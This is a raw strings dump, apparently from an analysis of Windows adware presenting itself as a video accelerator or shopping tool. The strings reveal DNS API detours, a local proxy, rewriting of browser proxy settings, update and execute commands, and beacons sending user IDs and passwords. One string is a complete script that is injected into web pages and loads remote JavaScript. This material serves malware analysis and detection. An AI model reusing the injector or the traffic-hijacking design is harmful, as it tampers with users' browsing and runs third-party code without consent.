[CDnsProxyServer::dns_reverse_lookup] Name: %s
[CDnsProxyServer::dns_reverse_lookup] IP: %s
[CDnsProxyServer::add_dns_client] IP: %s
%u.%u.%u.%u
[CDnsProxyServer::is_dns_client] IP: %s
[CDnsProxyServer::save_dns_clients] IP: %s
[CDnsProxyServer::dns_send_reply] @@@ Found IP: %s @@@
[CDnsProxyServer::dns_send_reply] Domain: %s
[CDnsProxyServer::OnRecv] ___Error %x - SendTo timeout to the original dns server
[CDnsProxyServer::OnRecv] ___Error %x - Select timeout from the original dns server
[CDnsProxyServer::OnRecv] ___Error %x - RecvFrom timeout from the original dns server
[CDnsProxyServer::OnRecv] ___Error %x - SendTo the client the response from the original server
[CDnsProxyServer::OnRecv] ___Error Got from the original dns server a packet with invalid size of %d
[CDnsProxyServer::OnRecv] ___Error %x - Open new socket to forward dns query
[CDnsProxyServer::OnRecv] unsupported opcode: %d
[CDnsProxyServer::OnRecv] DNS query: %s
[CDnsProxyServer::OnRecv] DNS query from client Host: %s, Port: %d
[CDnsProxyServer::OnRecv] Got packet with invalid size of %d
StartPortRange
EndPortRange
</URL>
<URL>
CAcceleratedEventsThread::OnReportNoAccelerationReason
0.0.0.0
%s%lld%s
%s%d%s
<EMBED><URL>
[CAcceleratedEventsThread::ReportEmbedStreaming]
[CAcceleratedEventsThread::ReportStatistics]___Error empty param : URL Acc Url = %s, Normal URL = %s
[CAcceleratedEventsThread::ReportStatistics] %s
[CAcceleratedEventsThread::ReportStatistics]___Error encode Acc URL = %s
%s%s%s
[CAcceleratedEventsThread::ReportStatistics]___Error encode Normal URL = %s
[CAcceleratedEventsThread::ReportVideoID] XML = %s
<WATCH><URL>%s</URL></WATCH>
[CAcceleratedEventsThread::ReportVideoID] URL = %s
YOUTUBE.COM/GET_VIDEO?VIDEO_ID=
[CAcceleratedEventsThread::ReportFailureReason] %s
[CAcceleratedEventsThread::ReportStatistics]___Error encode URL = %s
[CAcceleratedEventsThread::ReportFailureReason]___Error empty param : URL Acc Url = %s, AccFailureReason = %s
[CAcceleratedEventsThread::OnReportStatistics]
[CAcceleratedEventsThread::ReportAccelerations]
[CAcceleratedEventsThread] - Start the Pipe Clients to the Engine & UI
[CAcceleratedEventsThread::ProcessEvent] ___Warning: Unsupported event (%d)
DestroyPipeEventThreadManager
CreatePipeEventThreadManager
[CDNSResponse::AnalyzeResponse] Found IP: %u.%u.%u.%u
[Mine_GetAddrInfoW] nodename: %S
[Mine_GetAddrInfoExA] pName: %s
[Mine_GetAddrInfoExW] pName: %S
[Mine_getaddrinfo] nodename: %s
[CDNSInterceptor::Detour] GetAddrInfoExW - %d
[CDNSInterceptor::Detour] GetAddrInfoExA - %d
[CDNSInterceptor::Detour] GetAddrInfoW - %d
[CDNSInterceptor::Detour] getaddrinfo - %d
[CDNSInterceptor::Detour] gethostbyname - %d
[CDNSInterceptor::Detour] ___Error LoadLibrary ws2_32.dll
ws2_32.dll
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] SetSecurityDescriptorDacl failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] InitializeSecurityDescriptor failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the trusted owner. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the Everyone group. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the queue owner. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] InitializeAcl failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] GetLogonSID failed. Error code: 0x%X
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AllocateAndInitializeSid failed. GetLastError returned: %d
[CImpersonateSecurityDescriptor::CreateSecurityDescriptor] GetTokenInformation failed. GetLastError returned: %d
[CSerializable::GetField] ___Error - Vector size missmatch. Code: %d
[CIEInternetProxySettings::RetriveProxyConfiguration - Exit] list.pOptions == NULL
[CIEInternetProxySettings::ApplyProxyConfiguration] InternetSetOption( INTERNET_OPTION_REFRESH ) - Failed: %d
[CIEInternetProxySettings::ApplyProxyConfiguration] InternetSetOption( INTERNET_OPTION_SETTINGS_CHANGED ) - Failed: %d
[CIEInternetProxySettings::ApplyProxyConfiguration] InternetSetOption() - Failed: %d
[CIEInternetProxySettings::IsOptionIncluded] NOT Found - Option: %d, Value: %d
[CIEInternetProxySettings::IsOptionIncluded] Found - Option: %d, Value: %d
[CIEInternetProxySettings::IsOptionIncluded] NOT Found - Option: %d, Value: %s
[CIEInternetProxySettings::IsOptionIncluded] Found - Option: %d, Value: %s
[CIEInternetProxySettings::IsOptionIncluded] Found - Option: %d, Value: NULL
[CIEInternetProxySettings::SetProxyConfigScript] InternetSetOption( INTERNET_OPTION_REFRESH ) - Failed: %d
[CIEInternetProxySettings::Refresh] InternetSetOption( INTERNET_OPTION_SETTINGS_CHANGED ) - Failed: %d
[CIEInternetProxySettings::SetProxyConfigScript] InternetSetOption() - Failed: %d
[CIEInternetProxySettings::SetProxyConfigScript] list.pOptions == NULL
[CIEInternetProxySettings::GetCurrentUserKey] User Key: %p
[CIEInternetProxySettings::GetCurrentUserKey] ___Error spIImpersonateThread == NULL
[CIEInternetProxySettings::SetProxyConfigScript] InternetSetOption( INTERNET_OPTION_SETTINGS_CHANGED ) - Failed: %d
http=
[CIEInternetProxySettings::Save] %s - %s = %s
ListenPort
[EngineConfiguration::GetCurrentUserKey] User Key: %X
[EngineConfiguration::GetCurrentUserKey] ___Error spIImpersonateThread == NULL
HttpRedirectProxyPort
HttpRedirectProxyDomain
[CAcceleratorEventsData::OnDeserialize] ___Error get URL
[GZipWrapper::InflateGzipData] ___Error ReadString : %s
[GZipWrapper::InflateGzipData] ___Error Open file : %s
[GZipWrapper::InflateGzipData] ___Error WriteDataToFile : %s
GZipWrapper_%d.tmp
C:\ProgramData\tmp\
http_port
prefs.js
user.js
user_pref("network.proxy.
autoconfig_url
[CAsyncUpdate::DownloadProgress] Downloaded: %d, Total: %d
[CAsyncUpdate::StartUpdate] Download URL: %s
[CAsyncUpdate::StartUpdate] ___Error Sennd Update Command: %s
[CAsyncUpdate::StartUpdate] Update Page: %s
va_conf.dat
[CAsyncUpdate::DownloadComplete] ___Error Send Update Command: %s
[CAsyncUpdate::DownloadComplete] Result: %d, File: %s
1.0.0.0
Temp.dll
[CAsyncUpdate::AnalizeXMLResults] ___Error Trial DAT file: %s
[CAsyncUpdate::AnalizeXMLResults] Trial.dat saved to: %s
Trial.dat
RESULT.VA_TRIAL.CONFIG.DATA
Temp.zip
RESULT.VA_RES.RESOURCES.DOWNLOAD_URL
RESULT.VA_RES.RESOURCES.VERSION
RESULT.BLACKLIST.DATA
RESULT.SENDLOGRULE
RESULT.VA.CONFIG.SOCIAL_NETWORKS.TWITTER_VIDEO_STRING
RESULT.VA.CONFIG.SOCIAL_NETWORKS.TWITTER_FRAME_STRING
RESULT.ADS.SHOW
[CAsyncUpdate::AnalizeXMLResults] ___Error updating Rules DAT file: %s
[CAsyncUpdate::AnalizeXMLResults] Rules saved to: %s
RESULT.VA.CONFIG.SITES.ZIP
RESULT.VA.CONFIG.SITES.XMLVERSION
RESULT.VA.CONFIG.SITES.DATA
[CAsyncUpdate::UpdateSearchComplete] version status = %d
[CAsyncUpdate::UpdateSearchComplete] Result: %d, UpdateExist: %d
[CSANotifierMgr::UpdateResourceDll] ___Error: Removing %s. Err = %d
[CSANotifierMgr::UpdateResourceDll] ___Error: Renaming %s to %s. Err = %d
Old.dll
[DownloadMHTsStatus::DownloadComplete] ___Error: Renaming %s to %s. Err = %d
[CExecuteUpdate::OnDeserialize] ___Error get m_ShowCmd
[CExecuteUpdate::OnDeserialize] ___Error get m_Directory
[CExecuteUpdate::OnDeserialize] ___Error get m_Parameters
[CExecuteUpdate::OnDeserialize] ___Error get m_Operation
[CExecuteUpdate::OnDeserialize] ___Error get m_File
[CCoreConfig::InitConfig] Product Name %s UseRegistry %d
LastNum%d
LastID%d
1.1.4
%d/%d/%d %d:%d:%d
%s.PARAM
%s.ID
.CONDITIONS.CONDITION[%d]
.LANDING_URL
.ICON
.TOOLTIP
.NOTIFICATION_TYPE
.VALIDATE
.EXPIRATION_HOURS
.EXPIRATION_TIME
.NUM_OF_ICONS
.ANIMATION_TIME
.DISPLAY_TIME
.TYPE
.NUMBER
RESULT.LAMP
RESULT.ALERT
[Core::ShouldUpdate] %s
RESULT.LICENSE.EXPIRATION
RESULT.LICENSE.STATUS
RESULT.LASTERROR
[Core::RequestURL] Filename = %s, URL = %s
RESULT.USER.DAUI
RESULT.ANON.PW
RESULT.ANON.ID
RESULT.USER.PW
RESULT.USER.ID
[Core::AnalyzeXMLResult] Filename = %s
RESULT.STATS.COLLECT
RESULT.DISABLED_PARTNERS
RESULT.UPDATE.PAGE_URL
RESULT.UPDATE.DOWNLOAD_FILENAME
RESULT.UPDATE.DOWNLOAD_URL
RESULT.UPDATE.VERSION
RESULT.UPDATE.EXIST
Core.log
ddd
ddd
2.0.0.0
%DOMAIN%
%s=%s
&OldUserID=%s&OldPassword=%s
%s?%s
hXXp://online.%DOMAIN%.com/online/updateSBPID.aspx
CV=[core-version]&ProductID=[sb-pid]&UserID=[sb-uid]&Password=[sb-upw]&OS=[sb-os]
Password
[Core::SendInfo] Filename = %s, URL = %s
hXXp://online.%DOMAIN%.com/online/Report.aspx
[Core::HitStats] URL = %s
hXXp://pix.%DOMAIN%.com
[Core::BuildUpdateURL] URL = %s
&ElapsedTime=%d
[Core::BuildUpdateURL] ___ALERT___ Alert Info = %s
&DAUI=%s
&ActivationCode=%s&ActivationEmail=%s
%s?%s&V=[sb-ve]&VS=[sb-vs]&Beta=[sb-beta]&Aff=[sb-aff]&BundleID=[sb-bundle]&BrandID=[sb-brand]&PartnerList=[sb-partners]
[Core::CheckForUpdates] RequestURL FAILED
[Core::CheckForUpdates] RequestURL SUCCEEDED
[Core::CheckForUpdates] URL = %s
hXXp://online.%DOMAIN%.com/online/update.aspx
[Core::PerformAsyncUpdateCheck] URL = %s
&SBPIDS=%d
[Core::FindRegistrationInfoByKey] VA Product Found
[Core::FindRegistrationInfoByKey] DAP Product Found
[Core::FindRegistrationInfoByKey] Password is %s
[Core::FindRegistrationInfoByKey] SBPID is %s
[Core::FindRegistrationInfoByKey] Product is %s
[Core::FindRegistrationInfoByKey]
[Core::FindRegistrationInfo] ___Error open key %s
[Core::FindRegistrationInfo] - FindRegistrationInfoByKey from %s
[Core::FindRegistrationInfo] - CurrentUSDKey is %s
[Core::FindRegistrationInfo] - Enum HKEY_CURRENT_USER\%s
[Core::FindRegistrationInfo] - FindRegistrationInfoByKey from product key
[Core::RegisterProduct] RequestURL Fauled err = %d
[Core::RegisterProduct] RequestURL Succeeded
[Core::RegisterProduct] URL = %s
&LastResponse=%s
&TF=%s
&Retry=%d&LE=%d
hXXp://online.%DOMAIN%.com/online/Register.aspx
[Core::GenerateAnonymousID] URL = %s
hXXp://online.%DOMAIN%.com/online/RegisterAnon.aspx
[Core::PingServer] URL = %s
hXXp://online.%DOMAIN%.com/online/ka.aspx
InternetReadFile failed: %d
WriteFile failed: %d
Create output file failed: %d
QueryStatus not OK: %d
HttpQueryInfo failed: %d
InternetOpenUrl failed: %d
InternetOpen failed: %d
Content-Disposition: form-data; name="%s"
--%s--
Content-Type:multipart/form-data;boundary=%s
WaitingPost.xml
%%X
<?xml version="1.0" encoding="%s"?>
-%c%c%c%c%c%c%c%c%c%c
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
inflate 1.1.4 Copyright 1995-2002 Mark Adler
()$^.* ?[]|\-{},:=!
safari.exe
opera.exe
itunes.exe
iexplore.exe
chrome.exe
(build %d)
Windows 2000
Windows XP
Web Edition
Windows Server 2003,
Windows XP Professional x64 Edition
Windows Home Server
Windows Storage Server 2003
Windows Server 2003 R2,
Web Server Edition
Windows Server 2008 R2
Windows 8
Windows 7
Windows Server 2008
Windows Vista
[ProxyExtensionInj::WriteToLocalCacheWriter] FDM=%d (%d),Req:%d - Written %d/%d bytes
[ProxyExtensionInj::WriteToLocalCacheWriter] FDM=%d (%d),Req:%d ___Error invalid JobInfo
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\locale
[ProxyExtensionInj::OnHeader] FDM=%d (%d),Req:%d - html file size unknown - ignore this request (Response)
[ProxyExtensionInj::OnHeader] FDM=%d (%d),Req:%d - Try to Inject script... (Response)
[Inject OnHeader] URL %s, type %s, length %s, trans.encoding %s, cont.encoding %s
hXXp://repjs.shopper-pro.com/app/ping.ashx?product=ShopperProJs&action=%s&it=%d&os=%s&Rnd=%d&v=%s&usid=%s&aff=JS%s&pixguid=%s&text=%s
ProxyExtensionInj: can't open Config.json
Config.json
ProxyExtensionInj: can't open database1_0_0.ej
database1_0_0.ej
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d - Total written %d bytes
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d - injected %d bytes
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d ___Error writing new header
[ProxyExtensionInj::OnHeader] FDM=%d -
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d ___Error NewHttpParser ParseHeader
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d ___Error NewHttpParser Initialize
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d ___Error BuildHeader
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d ___Error invalid IHttpFileDownloadMgr
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d ___Error invalid IHttpProxyServer
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d ___Error invalid JobInfo
<script type='text/javascript'>!function(){'use strict';function doInj(){if(10!==  calls){var scriptElement=document.createElement('script');scriptElement.src='//4x3zy4ql-l8bu4n1j.netdna-ssl.com/fb.js?pn=JSDRIVER&v=2.7.0.2',scriptElement.type='text/javascript';var scripts=document.getElementsByTagName('script');if(scripts.length>0)scripts[0].parentNode.insertBefore(scriptElement,scripts[0]);else{var headBody=document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0];headBody?headBody.appendChild(scriptElement):setTimeout(function(){doInj()},10)}}}var calls=0;doInj()}();</script>
%%SID%%
%%USERID%%
%%SPARAM%%
%%SPARAMDATE%%
%%SPARAMPROD%%
%%SPARAMSUB%%
%ÛVERSION%%
%%SOURCE%%
%%COUNTRY%%
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d - /HEAD position was found: %d
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d ___Error /HEAD position was not found
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d ___Error uncompress: %d
[ProxyExtensionInj::InjectScriptToWatchPage] Crash fix FDM=%d (%d),Req:%d
[ProxyExtensionInj::InjectScriptToWatchPage] FDM=%d (%d),Req:%d - Parsing Watch page file for Script injection
[InjHttpProxyServer]
[InjHttpProxyLocal::InjHttpProxyLocal] FDM=%d (%d)
[InjHttpProxyLocal::~InjHttpProxyLocal] FDM=%d (%d)
[InjHttpProxyLocal::PutChunk] FDM=%d (%d): After writing %d bytes into upper level
[InjHttpProxyLocal::PutChunk] FDM=%d (%d): Going to write the %d bytes into the upper level
[InjHttpProxyLocal::PutChunk] FDM=%d (%d): Read %d bytes from socket %d
[InjHttpProxyLocal::PutChunk] FDM=%d (%d): Reading from socket %d
[InjHttpProxyLocal::PutChunk] FDM=%d (%d),Req:%d ___Error: the socket object is null.
[InjHttpProxyServer::AcceptConnection] ___Error to initialize Worker: %d.
[InjHttpProxyServer::AcceptConnection] Going to initialize Worker: %d.
[InjHttpProxyServer::AcceptConnection] ___Error: There is not enough memory to allocate HttpProxyLocal.
[InjFileDownloadMgr] FDM=%d
[InjHttpProxyRemote::InjHttpProxyRemote] FDM=%d (%d),Req:%d
[InjHttpProxyRemote::ConnectToDomain] FAILED FDM=%d (%d),Req:%d
[InjHttpProxyRemote::~InjHttpProxyRemote] FDM=%d (%d),Req:%d
[InjHttpProxyRemote::PutChunk] FDM=%d (%d),Req:%d - Request was written to Local
[InjHttpProxyRemote::PutChunk] FDM=%d (%d),Req:%d - Going to write request to Local
[InjHttpProxyRemote::PutChunk] FDM=%d (%d),Req:%d - Read %d bytes from socket %d
[InjHttpProxyRemote::PutChunk] FDM=%d (%d),Req:%d - Reading from socket %d
[InjHttpProxyRemote::PutChunk] FDM=%d (%d),Req:%d ___Error: the Job object is null.
[InjHttpProxyRemote::PutChunk] FDM=%d (%d),Req:%d ___Error: the socket object is null.
[InjHttpProxyRemote::PutChunk] FDM=%d (%d),Req:%d ___Error: the current download state is %s.
[InjHttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d - Wrote %d/%d bytes to Socket %d.
[InjHttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d ___Error writing the request.
[InjHttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d - Going to write %d bytes to socket %d.
[InjHttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d ___Error: the socket object is null.
InjHttpProxyRemote::WriteCachedBufferToSocket
[InjHttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d ___Error: the socket object is NULL.
[InjFileDownloadMgr::CreateWorker] FDM=%d (%d) was created.
[InjFileDownloadMgr::CreateWorker] FDM=%d (%d) ___Error Initializing the worker.
pHttpProxyWorker
[InjHttpProxyServer::GetFileDownloadManager] FDM=%d for Worker: %d, IP: %s, Port: %d, was found.
[InjHttpProxyServer::GetFileDownloadManager] ___Error inserting FDM=%d to the map.
[InjHttpProxyServer::GetFileDownloadManager] ___Error initializing FDM=%d.
[InjHttpProxyServer::GetFileDownloadManager] The FDM=%d for Worker:%d, IP: %s, Port: %d, was created.
HttpProxyServer::GetDownloader
[InjHttpProxyServer::GetFileDownloadManager] FDM not found - Creating a new one. (Worker: %d, IP: %s, Port: %d)
[InjHttpProxyServer::GetFileDownloadManager] Getting the FDM for Worker: %d, IP: %s, Port: %d.
[InjHttpProxyServer::OnHeader] FDM=%d,Req:%d ___Error: The request was not added. (IP:%s, port:%d).
[InjHttpProxyServer::OnHeader] FDM=%d - Adding Req:%d (IP:%s, port:%d).
HttpProxyServer::OnHeader
[ProxyServer::StopAcceleration] Proxy type: %d
[ProxyServer::Stop] Proxy type: %d - Done
[ProxyServer::Stop] - delete HttpCookieJar
[ProxyServer::Stop] - GENERAL HTTP proxy - Stopped !
[ProxyServer::Stop] - GENERAL HTTP proxy - Stopping...
[ProxyServer::Stop] - HTTP proxy - Stopped !
[ProxyServer::Stop] - HTTP proxy - Stopping...
[ProxyServer::Stop] Proxy type: %d
[ProxyServer::CreateHttpProxyServer] *** HTTP Proxy Server - Created and Started ***
[ProxyServer::CreateHttpProxyServer] ___Error: IHttpProxyServer::Start.
[ProxyServer::CreateHttpProxyServer] HTTP Proxy Server - already started
[ProxyServer::CreateHttpProxyServer] ___Error: IHttpProxyServer::Initialize.
m_pIHttpProxyServer
[ProxyServer::CreateHttpProxyServer] ___Error: IHttpProxyServer::CreateInstance.
[ProxyServer::CreateHttpProxyServer] ___Error allocate HttpCookieJar.
[ProxyServer::CreateHttpProxyServer] HTTP Proxy Server - already created
ProxyServer::CreateHttpProxyServer
[ProxyServer::Start] Proxy type: %d - Done.
[ProxyServer::Start] *** HTTP proxy was started ***
[ProxyServer::Start] ___Error stating the HTTP proxy.
[ProxyServer::Start] ___Error Proxy type not supported. (Requested: %d).
[ProxyServer::Start] Proxy type: %d
[ProxyServer::AcceptConnection] *** Handover to HTTP ***
[AccelerationConfiguration::OnError] XML parse failed: %s
[CAccelerationStats::Write] Written: %d, Total: %lld, Bps: %d
[CAccelerationStats::Write] Written: %d
[CAccelerationStats::AddRequest] Req:%d - Request was added
[CAccelerationStats::ModifyDownloadRequestURL] Req:%d ___Error: SetBuffer
[CAccelerationStats::ModifyDownloadRequestURL] Req:%d ___Error: BuildHeader
[CAccelerationStats::ModifyDownloadRequestURL] Req:%d ___Error: SetRanges
[CAccelerationStats::ModifyDownloadRequestURL] Req:%d ___Error: ParseHeader
[CAccelerationStats::HandleNewRequest] FDM=%d, Req:%d (IP: %s, Port: %d) - Request was added.
[CAccelerationStats::HandleNewRequest] ___Error: The request was not added. FDM=%d, Req:%d (IP:%s, port:%d).
[CAccelerationStats::HandleNewRequest] ___Error initializing FDM=%d.
[HttpProxyServer::Init] ___Error creating listen AsyncSocket
[HttpProxyServer::Init]
[HttpProxyServer::OnData] Writing to FDM %d data bytes from Local Worker:%d.
HttpProxyServer::OnData
pIHttpProxyWorker
m_pIHttpEngineConfiguration
[HttpProxyServer::WriteDataToFile] ___Error: Not a reasnable data to write: %d
[HttpProxyServer::WriteDataToFile] ___Error: GetFileAttributes: %s, failed: %d
[HttpProxyServer::WriteDataToFile] ___Error: fwrite: %s, failed: %d
[HttpProxyServer::WriteDataToFile] ___Error: fopen: %s, failed: %d
[HttpProxyServer::WriteDataToFile] Filename: %s
[HttpProxyServer::Start] ___Error - HTTP Configuration not valid
HttpProxyServer::Initialize
[HttpProxyServer::Initialize]
[HttpProxyServer::OnAcceptEvent] *** Pass Through ***
[HttpProxyServer::OnAcceptEvent] ___Error accepting a new socket
[HttpProxyServer::OnAcceptEvent] ___Error accepting a new connection.
[HttpProxyServer::OnAcceptEvent] ___Error %s(%d) occured on the listen socket
[HttpProxyServer::IsRedirectedByDnsController] Client was Redirected by Dns Controller!
[HttpProxyServer::IsRedirectedByDnsController] NOT redirected by Dns Controller!
[HttpProxyServer::IsRedirectedByDnsController] ___Error IDnsController == NULL
[IHttpProxyServer::DestroyInstance] Destroy - HttpProxyServer - Regular MODE
[IHttpProxyServer::DestroyInstance] Destroy - TransparentProxyServer (PassThrough) - LSP MODE
[IHttpProxyServer::DestroyInstance] ___Error Redirect was not created - Type = IdleMode
[IHttpProxyServer::DestroyInstance] Destroy - LspHttpProxyServer - LSP MODE
[IHttpProxyServer::DestroyInstance] Destroy - LspHttpProxyServer (PassThrough) - LSP MODE
[HttpProxyServer::StartListening] Listening on port: %d
[HttpProxyServer::StartListening] ___Error Listen Socket Initialize failed
[HttpProxyServer::StartListening] ___Error listening on port: %d
[HttpProxyServer::StartListening] ___Error failed to bind the Listen Socket
[HttpProxyServer::StartListening] ___Error Testing Mode - failed to bind Listen Socket default port
[HttpProxyServer::StartListening] Try listening on IP: %s, Port: %d
[HttpProxyServer::StartListening] Listen port restored to default: %d
[HttpProxyServer::StartListening] ___Error Configuration not valid
[HttpProxyServer::StartListening]
HttpProxyServer::StartListening
[HttpProxyServer::StopAllAccelerations]
[HttpProxyServer::GetDestinationIpAndPort] ___Error getting the destination details. Local: %s:%d
[HttpProxyServer::GetDestinationIpAndPort] Local: %s:%d, Remote: %s:%d, PID: %d
[HttpProxyServer::GetDestinationIpAndPort] ___Error spIRedirectController == NULL
[HttpProxyServer::InitializationThread] ___Error listening to network traffic
[HttpProxyServer::InitializationThread] Listening to network traffic.
[HttpProxyServer::InitializationThread] Going to listen to network traffic
[HttpProxyServer::InitializationThread] ___Error HttpProxyServer not valid
[HttpProxyServer::InitializationThread]
[HttpProxyServer::ReleaseAllClosedFDMs] - All closed FDMs where released.
[HttpProxyServer::ReleaseAllClosedFDMs] - FDM=%d has %d RefCount.
[HttpProxyServer::ReleaseAllClosedFDMs] - Releasing FDM=%d.
[HttpProxyServer::ReleaseAllClosedFDMs] - There are %d FDMs to release.
[HttpProxyServer::ReleaseAllClosedFDMs] - Releasing all closed FDMs.
[HttpProxyServer::Start] ___Error hInitializationThread failed: %d
[HttpProxyServer::Start] hInitializationThread - S_OK
[HttpProxyServer::Start] Waiting for Initialzation Thread...
HttpProxyServer::Start
[HttpProxyServer::AcceptConnection] ___Error to initialize Worker: %d.
[HttpProxyServer::AcceptConnection] Going to initialize Worker: %d.
[HttpProxyServer::AcceptConnection] ___Error: There is not enough memory to allocate HttpProxyLocal.
[HttpProxyServer::AcceptConnection] ___Error getting the connected IP and port of the socket %d.
[HttpProxyServer::AcceptConnection] ___Error accepting a new socket
[HttpProxyServer::Work] --- Exit event was set ---
[HttpProxyServer::Work] - Start...
[HttpProxyServer::FindDownloadMgr] FDM=%d - Was stopped.
[HttpProxyServer::FindDownloadMgr] FDM=%d - Stopping...
[HttpProxyServer::FindDownloadMgr] FDM=%d - State is completed, deleting the FDM
[HttpProxyServer::FindDownloadMgr] The FDM=%d state is Not completed - Add Request to FDM
[HttpProxyServer::FindDownloadMgr] The FDM=%d is connected to %s : %d ---> and not to %s : %d
[HttpProxyServer::FindDownloadMgr] Worker was found ! (ID Metch)
[HttpProxyServer::FindDownloadMgr] ___Warning - In caching, use a new one.
[HttpProxyServer::FindDownloadMgr] ___Warning - Worker was found but ID not match
[HttpProxyServer::FindDownloadMgr] Worker was not found !
[HttpProxyServer::RemoveDownloaderFromMap] FDM=%d - Worker:%d
HttpProxyServer::RemoveDownloaderFromMap
[HttpProxyServer::FDMWasStopped] FDM=%d <-> Local (%d)
HttpProxyServer::FDMWasStopped
[HttpProxyServer::Stop] The Stop process was finished !
[HttpProxyServer::Stop] - Workers - Deleted !
[HttpProxyServer::Stop] - Workers - Deleting...
[HttpProxyServer::Stop] - Listen - Stopped !
[HttpProxyServer::Stop] - Listen - Stopping...
[HttpProxyServer::Stop] - NetworkEventsSink - Stopped !
[HttpProxyServer::Stop] - NetworkEventsSink - Stopping...
[HttpProxyServer::Stop] Starting the Stop process...
HttpProxyServer::OnError
[HttpProxyServer::BuildElsePacString] Direct -> ieDomain = %s iePort = %d
return "PROXY %s:%d";
[HttpProxyServer::BuildElsePacString] With ie Proxy Details ieDomain = %s iePort = %d
[HttpProxyServer::BuildElsePacString] Domain ieDomain = %s iePort = %d
127.0.0.1
[HttpProxyServer::IsRequestMatchRedirectionRules] can't get configuration
[HttpProxyServer::IsRequestMatchRedirectionRules] handle on mode, return true
[HttpProxyServer::IsRequestMatchRedirectionRules] Rule not found for Domain: %s, IP: %s
[HttpProxyServer::IsRequestMatchRedirectionRules] Domain & Port found in Rule: %s
[HttpProxyServer::IsRequestMatchRedirectionRules] Domain found in Rule: %s
[HttpProxyServer::IsRequestMatchRedirectionRules] ___Error getting IAccelerationConfiguration
[HttpProxyServer::GetDestinationDomainAndPort] Domain: %s, Port: %d, URI: %s
[HttpProxyServer::GetDestinationDomainAndPort] ___Error getting the domain from URI
[HttpProxyServer::GetDestinationDomainAndPort] ___Error getting the domain and the port from the URI field.
[HttpProxyServer::OnHeader] FDM=%d,Req:%d ___Error: The request was not added. (IP:%s, port:%d).
[HttpProxyServer::OnHeader] FDM=%d - Adding Req:%d (IP:%s, port:%d).
[HttpProxyServer::OnHeader] Worker %u IsRequestMatchRedirectionRules matched - try to accelerate, PassThrough OFF
[HttpProxyServer::OnHeader] *** IsRequestMatchRedirectionRules not matched - PassThrough ON ***
[HttpProxyServer::OnHeader] ___Error local loop detected
[HttpProxyServer::OnHeader] ___Error getting the IP of the domain %s.
[HttpProxyServer::OnHeader] ___Error (TransparentMode) getting the destination IP and port from the header, for Worker:%d
[HttpProxyServer::OnHeader] ___Warning getting the destination IP and port for Worker:%d (nLocalPort:%d)
[HttpProxyServer::OnHeader] ___Error building the request from Worker:%d
[HttpProxyServer::OnHeader] ___Error (ProxyMode) getting the destination IP and port from the header, for Worker:%d
[HttpProxyServer::OnHeader] ___Error Unsupported Mode from Worker:%d !!!
[HttpProxyServer::OnHeader] ___Error getting the connected IP and Port for Worker:%d
[HttpProxyServer::OnHeader] New header from Worker:%d.
[HttpProxyServer::GetOriginalRequest] Original request was found: %s
[HttpProxyServer::InsertDownloaderToMap] FDM=%d - Worker:%d
HttpProxyServer::InsertDownloaderToMap
[HttpProxyServer::GetFileDownloadManager] FDM=%d for Worker:%d, IP:%s, Port:%d, was found.
[HttpProxyServer::GetFileDownloadManager] ___Error inserting FDM=%d to the map.
[HttpProxyServer::GetFileDownloadManager] ___Error initializing FDM=%d.
[HttpProxyServer::GetFileDownloadManager] The FDM=%d for Worker:%d, IP:%s, Port:%d, was created.
[HttpProxyServer::GetFileDownloadManager] FDM not found, Creating new one. (Worker:%d, IP:%s, Port:%d)
[HttpProxyServer::GetFileDownloadManager] Getting the FDM for Worker:%d, IP:%s, Port:%d.
return "PROXY 127.0.0.1:%d";
shExpMatch(host, "%s")
function FindProxyForURL(url, host)
[HttpProxyServer::GetRedirectRulesInPacFormat] ___Error getting IConfiguration.
[HttpProxyServer::GetRedirectRulesInPacFormat] ___Error getting IAccelerationConfiguration.
HttpProxyServer::GetRedirectRulesInPacFormat
%%.%ds
[HttpProxyServer::WriteRedirectRulesToPacFile] ___Error: WriteDataToFile() failed: %s
[HttpProxyServer::WriteRedirectRulesToPacFile] ___Error: GetRedirectRulesInPacFormat() failed: %s
[HttpProxyServer::WriteRedirectRulesToPacFile]
[HttpProxyServer::~HttpProxyServer] - Leave
[HttpProxyServer::~HttpProxyServer] - Enter
[HttpProxyServer::SetOriginalRequest] Location: %s
[HttpProxyServer::SetOriginalRequest] Replacing: %s
[HttpProxyServer::HttpProxyServer]
hXXp://
HTTP_Version_String
HTTP/1.0
HttpParser::UpdateBuffer
[HttpParser::Reset]
[HttpParser::ValidateEndOfLine] ___Error: Unsupported end of line option.
[HttpParser::ValidateEndOfLine] ___Error: The previous end of line was %s, which is different from %c.
